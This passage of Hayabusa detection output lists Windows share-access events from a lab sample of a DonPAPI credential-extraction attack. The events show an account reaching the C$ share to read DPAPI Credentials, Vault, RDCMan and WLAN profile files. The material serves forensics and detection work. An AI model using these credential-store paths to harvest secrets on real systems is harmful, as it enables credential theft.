+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.815 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 